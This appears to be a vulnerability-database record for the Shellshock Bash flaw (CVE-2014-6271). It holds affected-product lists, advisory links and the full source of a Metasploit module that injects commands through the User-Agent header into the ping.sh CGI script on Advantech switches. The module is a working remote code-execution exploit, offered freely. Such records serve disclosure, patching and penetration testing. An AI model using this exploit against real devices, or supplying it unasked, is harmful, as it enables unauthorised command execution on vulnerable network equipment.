Details of VAR-E-201409-0017

ID

VAR-E-201409-0017

CVE

cve_id:	CVE-2014-7196	Trust: 1.0
cve_id:	CVE-2014-6271	Trust: 1.0
cve_id:	CVE-2014-6278	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 38849

EDB ID

38849

TITLE

Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit) - CGI remote Exploit

Trust: 1.0

sources: EXPLOIT-DB: 38849

DESCRIPTION

Advantech Switch - 'Shellshock' Bash Environment Variable Command Injection (Metasploit). CVE-2014-7196CVE-112004CVE-2014-6271 . remote exploit for CGI platform

Trust: 1.0

sources: EXPLOIT-DB: 38849

AFFECTED PRODUCTS

vendor:	advantech	model:	switch	scope:	-	version:	-	Trust: 1.0
vendor:	xerox	model:	workcentre	scope:	eq	version:	7245	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7242	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7238	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7235	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7232	Trust: 0.3
vendor:	xerox	model:	workcentre	scope:	eq	version:	7228	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	78000	Trust: 0.3
vendor:	xerox	model:	phaser	scope:	eq	version:	67000	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9393	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9303	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9302	Trust: 0.3
vendor:	xerox	model:	colorqube	scope:	eq	version:	9301	Trust: 0.3
vendor:	ubuntu	model:	linux lts i386	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux lts amd64	scope:	eq	version:	12.04	Trust: 0.3
vendor:	ubuntu	model:	linux sparc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux powerpc	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux i386	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux arm	scope:	eq	version:	10.04	Trust: 0.3
vendor:	ubuntu	model:	linux amd64	scope:	eq	version:	10.04	Trust: 0.3
vendor:	sun	model:	solaris	scope:	eq	version:	11	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.2	Trust: 0.3
vendor:	oracle	model:	vm virtualbox	scope:	eq	version:	3.1	Trust: 0.3
vendor:	oracle	model:	linux	scope:	eq	version:	5	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6.2	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	6	Trust: 0.3
vendor:	oracle	model:	enterprise linux	scope:	eq	version:	5	Trust: 0.3
vendor:	mcafee	model:	email gateway patch	scope:	eq	version:	7.01	Trust: 0.3
vendor:	mcafee	model:	email gateway	scope:	eq	version:	7.0	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.22	Trust: 0.3
vendor:	mcafee	model:	email gateway hotfix	scope:	eq	version:	6.7.21	Trust: 0.3
vendor:	ibm	model:	ds8000	scope:	eq	version:	0	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	7.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	6.1	Trust: 0.3
vendor:	ibm	model:	aix	scope:	eq	version:	5.3	Trust: 0.3
vendor:	hp	model:	insight control	scope:	eq	version:	0	Trust: 0.3
vendor:	gnu	model:	bash	scope:	eq	version:	4.2	Trust: 0.3
vendor:	gentoo	model:	linux	scope:	-	version:	-	Trust: 0.3
vendor:	cisco	model:	wide area application services	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified ip phone	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	unified contact center express	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	network analysis module	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	mds	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	gss 4492r global site selector	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	emergency responder	scope:	eq	version:	1.1	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	5.0	Trust: 0.3
vendor:	cisco	model:	digital media manager	scope:	eq	version:	0	Trust: 0.3
vendor:	cisco	model:	show and share	scope:	eq	version:	5(2)	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16.2	Trust: 0.3
vendor:	avaya	model:	ip deskphone	scope:	eq	version:	96x16	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 38849

EXPLOIT

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Advantech Switch Bash Environment Variable Code Injection (Shellshock)',
'Description' => %q{
This module exploits the Shellshock vulnerability, a flaw in how the Bash shell
handles external environment variables. This module targets the 'ping.sh' CGI
script, acessible through the Boa web server on Advantech switches. This module
was tested against firmware version 1322_D1.98.
},
'Author' => 'hdm',
'References' => [
['CVE', '2014-6271'],
['CWE', '94'],
['OSVDB', '112004'],
['EDB', '34765'],
['URL', 'https://community.rapid7.com/community/infosec/blog/2015/12/01/r7-2015-25-advantech-eki-multiple-known-vulnerabilities'],
['URL', 'https://access.redhat.com/articles/1200223'],
['URL', 'http://seclists.org/oss-sec/2014/q3/649']
],
'Privileged' => false,
'Arch' => ARCH_CMD,
'Platform' => 'unix',
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x0A\x0D",
'DisableNops' => true,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'openssl generic'
}
},
'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]],
'DefaultTarget' => 0,
'License' => MSF_LICENSE,
'DisclosureDate' => 'Dec 01 2015'
))
register_options([
Opt::RPORT(80)
], self.class)
end

#
# CVE-2014-6271
#
def cve_2014_6271(cmd)
%{() { :;}; $(#{cmd}) & }
end

#
# Check credentials
#
def check
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/ping.sh'
)
if !res
vprint_error("#{peer} - No response from host")
return Exploit::CheckCode::Unknown
elsif res.headers['Server'] =~ /Boa\/(.*)/
vprint_status("#{peer} - Found Boa version #{$1}")
else
print_status("#{peer} - Target is not a Boa web server")
return Exploit::CheckCode::Safe
end

if res.body.to_s.index('127.0.0.1 ping statistics')
return Exploit::CheckCode::Detected
else
vprint_error("#{peer} - Target does not appear to be an Advantech switch")
return Expoit::CheckCode::Safe
end
end

#
# Exploit
#
def exploit
cmd = cve_2014_6271(payload.encoded)
vprint_status("#{peer} - Trying to run command '#{cmd}'")
res = send_request_cgi(
'method' => 'GET',
'uri' => '/cgi-bin/ping.sh',
'agent' => cmd
)
end

end

Trust: 1.0

sources: EXPLOIT-DB: 38849

EXPLOIT LANGUAGE

Trust: 1.0

sources: EXPLOIT-DB: 38849

PRICE

free

Trust: 1.0

sources: EXPLOIT-DB: 38849

TYPE

'Shellshock' Bash Environment Variable Command Injection (Metasploit)

Trust: 1.0

sources: EXPLOIT-DB: 38849

CREDITS

Metasploit

Trust: 1.0

sources: EXPLOIT-DB: 38849

EXTERNAL IDS

db:	NVD	id:	CVE-2014-7196	Trust: 1.0
db:	NVD	id:	CVE-2014-6271	Trust: 1.0
db:	EXPLOIT-DB	id:	38849	Trust: 1.0
db:	JUNIPER	id:	JSA10661	Trust: 0.3
db:	JUNIPER	id:	JSA10648	Trust: 0.3
db:	ICS CERT	id:	ICSA-14-269-01	Trust: 0.3
db:	CERT/CC	id:	VU#252743	Trust: 0.3
db:	MCAFEE	id:	SB10085	Trust: 0.3
db:	NVD	id:	CVE-2014-7169	Trust: 0.3
db:	NVD	id:	CVE-2014-6278	Trust: 0.3
db:	BID	id:	70166	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 38849

REFERENCES

url:	https://nvd.nist.gov/vuln/detail/cve-2014-6271	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2014-7196	Trust: 1.0
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04540692	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004879	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685873	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685875	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21687971	Trust: 0.3
url:	http://www.gnu.org/software/bash/	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096315	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04478866	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/1a2e5-5116a33c2fb27/cert_security_mini-_bulletin_xrx15k_for_77xx_r15-03_v1.0.pdf	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686433	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004898	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=isg3t1021279	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04558068	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686246	Trust: 0.3
url:	https://www-304.ibm.com/connections/blogs/psirt/entry/security_bulletin_vulnerabilities_in_bash_affect_certain_qlogic_products_that_ibm_resells_for_bladecenter_and_flex_system_products_cve_2014_6271_c	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685733	Trust: 0.3
url:	http://www.huawei.com/en/security/psirt/security-bulletins/security-notices/archive/hw-372538.htm	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004905	Trust: 0.3
url:	http://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04561445	Trust: 0.3
url:	http://seclists.org/fulldisclosure/2014/oct/25	Trust: 0.3
url:	http://www.vmware.com/security/advisories/vmsa-2014-0010.html	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685673	Trust: 0.3
url:	https://blogs.oracle.com/sunsecurity/entry/multiple_vulnerabilities_in_bash	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=ssg1s1004982	Trust: 0.3
url:	http://www.fortiguard.com/advisory/fg-ir-14-030/	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21687079	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686445	Trust: 0.3
url:	http://seclists.org/bugtraq/2015/feb/77	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004928	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/29a7e-50e49f9c009f9/cert_security_mini_bulletin_xrx14g_for_77xx_v1.1.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471532	Trust: 0.3
url:	https://supportcenter.checkpoint.com/supportcenter/portal?eventsubmit_dogoviewsolutiondetails=&solutionid=sk102673	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685541	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686479	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04497042	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paps5	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479536	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479492	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=ssg1s1004903	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=nas8n1020272	Trust: 0.3
url:	https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04512907	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paptz	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004911	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2eeef-51056e459c6d8/cert_security_mini-_bulletin_xrx15h_for_p7800_v1_0.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479505	Trust: 0.3
url:	https://kc.mcafee.com/corporate/index?page=content&id=kb83017	Trust: 0.3
url:	http://support.f5.com/kb/en-us/solutions/public/15000/600/sol15629.html?ref=rss	Trust: 0.3
url:	http://lcamtuf.blogspot.in/2014/09/quick-notes-about-bash-bug-its-impact.html	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004915	Trust: 0.3
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10085	Trust: 0.3
url:	https://ics-cert.us-cert.gov/advisories/supplement-icsa-14-269-01	Trust: 0.3
url:	https://downloads.avaya.com/css/p8/documents/100183172	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487573	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004945	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096533	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=ssg1s1004932	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04488200	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479601	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685749	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2a901-510567b876a35/cert_security_mini-_bulletin_xrx15g_for_p6700_v1_0.pdf	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04497075	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479402	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685691	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686131	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10661&cat=sirt_1&actp=list	Trust: 0.3
url:	http://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20140926-bash	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04479398	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686024	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2b8d8-513128526dd97/cert_security_mini-_bulletin_xrx15m_for_wc75xx_v1_1.pdf	Trust: 0.3
url:	http://seclists.org/bugtraq/2015/feb/76	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21685837	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=isg3t1021272	Trust: 0.3
url:	http://www.kb.cert.org/vuls/id/bluu-9paptm	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/1a7a1-50f12e334b734/cert_security_mini-_bulletin_xrx14h_for_wc59xx_v1.pdf	Trust: 0.3
url:	https://lists.gnu.org/archive/html/bug-bash/2014-10/msg00040.html	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2a20e-5105457a515cc/cert_security_mini-_bulletin_xrx15e_for_wc57xx_v1_0.pdf	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004897	Trust: 0.3
url:	http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/archive/hw-377648.htm	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=ssg1s1004933	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686037	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04496383	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686098	Trust: 0.3
url:	http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=migr-5096503	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04487558	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=isg3t1021361	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471546	Trust: 0.3
url:	https://www-304.ibm.com/support/docview.wss?uid=swg21686132	Trust: 0.3
url:	http://lcamtuf.blogspot.de/2014/09/bash-bug-apply-unofficial-patch-now.html	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04471538	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685914	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21685604	Trust: 0.3
url:	https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c04475942	Trust: 0.3
url:	https://www.xerox.com/download/security/security-bulletin/2df3c-51055b159fd50/cert_security_mini_bulletin_xrx15f_for_connectkey_1.5_v1-01.pdf	Trust: 0.3
url:	https://downloads.avaya.com/css/p8/documents/100183088	Trust: 0.3
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21686171	Trust: 0.3
url:	http://www.oracle.com/technetwork/topics/security/bashcve-2014-7169-2317675.html	Trust: 0.3
url:	http://www.ibm.com/support/docview.wss?uid=swg21686494	Trust: 0.3
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10648	Trust: 0.3

sources: BID: 70166 // EXPLOIT-DB: 38849

SOURCES

db:	BID	id:	70166
db:	EXPLOIT-DB	id:	38849

LAST UPDATE DATE

2023-05-30T10:41:05.596000+00:00

SOURCES UPDATE DATE

db:

BID

id:

70166

date:

2016-07-05T21:53:00

SOURCES RELEASE DATE

db:	BID	id:	70166	date:	2014-09-27T00:00:00
db:	EXPLOIT-DB	id:	38849	date:	2015-12-02T00:00:00

ID

CVE

EDB ID

TITLE

DESCRIPTION

AFFECTED PRODUCTS

EXPLOIT

EXPLOIT LANGUAGE

PRICE

TYPE

TAGS

CREDITS

EXTERNAL IDS

REFERENCES

SOURCES

LAST UPDATE DATE

SOURCES UPDATE DATE

SOURCES RELEASE DATE